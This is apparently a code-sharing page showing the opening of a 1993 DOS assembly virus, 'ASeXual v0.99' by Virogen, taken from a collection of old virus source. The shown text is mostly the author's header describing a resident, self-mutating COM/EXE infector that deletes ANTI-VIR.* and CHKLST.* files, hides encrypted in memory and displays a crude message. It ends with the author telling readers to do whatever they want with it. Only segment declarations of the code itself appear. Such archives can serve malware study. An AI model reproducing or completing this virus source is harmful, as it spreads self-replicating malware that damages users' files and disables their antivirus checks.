asex_099.asm
来自「More than 800 virus code (old school) ju」· 汇编 代码 · 共 46 行
ASM
46 行
;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
; ************************************************
; ASeXuAl v0.99 - BY VIROGEN - 10-12-93
; ************************************************
; - Compatible with : TASM /m2
;
; This virus is actually the continuance of the Offspring line of virii..
; BUT I decided to change the name because 98% of the virus code has
; changed since the released of the first Offspring virus, and I felt
; this release had substantial changes that finally merit a new name!
;
; ASeXual v0.99
; 哪哪哪哪哪哪哪哪哪哪哪
;
; TYPE : Parastic & Spawning Resident Encrypting (PSRhA)
;
; characteristics:
; This virus is a memory resident parastic COM infector and spawning
; EXE infector. It is mutative.. with only 2 bytes remain constant
; in replicated copies, but none in constant relative locations to the start
; of viral code or to each other. It infects up to 5 files in the
; current directory which a program is executed or a new drive is selected.
; It first searches out EXE hosts, and if there are none to be infected,
; it then proceeds to COM infections. All ANTI-VIR.* and CHKLST.* files
; in the current directory are killed before any file is infected. This
; virus is also kept encrypted in memory to prevent easy detection of it
; there too. It's code is stored just below the 640k boundary.
;
; activation:
; This is a non-malicious virus and it's activation is simple.. On the
; 2nd of any month, when an infected program is executed it displays :
; "ASeXual virus v0.99 - Your computer has been artificially Phucked!"
; .. while beeping and flashing the keyboard lights as well as attempting
; print screens.
;
; Do whatever you want with this virus.. but don't take my name off
; the code. .. oh yea.. and don't hold me responsible if you infect
; yourself, or someone else. It's not my problem.
;
title ASeXual v0.99
cseg segment
assume cs: cseg, ds: cseg, ss: cseg, es: cseg
;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
; equates
;哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪哪
⌨️ 快捷键说明
复制代码Ctrl + C
搜索代码Ctrl + F
全屏模式F11
增大字号Ctrl + =
减小字号Ctrl + -
显示快捷键?